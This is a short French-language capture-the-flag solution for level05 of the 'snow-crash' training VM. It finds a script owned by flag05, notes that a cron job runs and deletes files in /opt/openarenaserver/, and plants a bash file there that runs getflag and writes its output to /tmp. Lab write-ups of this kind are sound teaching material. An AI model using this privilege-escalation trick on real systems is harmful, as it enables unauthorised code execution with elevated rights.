snow-crash/level05/Ressources/solution

17 lines
538 B
Plaintext
Raw Normal View History

2021-01-20 00:05:19 +00:00
avec
$ find / -user flag05 2>/dev/null
> /usr/sbin/openarenaserver
On peut cat le script il execute tout les fichier dans : /opt/openarenaserver/ puis les supprime
2021-01-20 00:05:19 +00:00
En creant un fichier dans ce dossier on peut observer qu'il est rapidement suprimer, donc executer
2021-01-20 00:05:19 +00:00
il suffit d'avoir un fichier qui contient: getflag > /tmp/flag05
$ echo -e '#!/bin/bash \x0a getflag > /tmp/.flag05 ' > /opt/openarenaserver/exploit_05
puis au bout de 1 minutes:
$ cat /tmp/.flag05
il sera alors execute et on pourra recuperer le flag dans /tmp/.flag05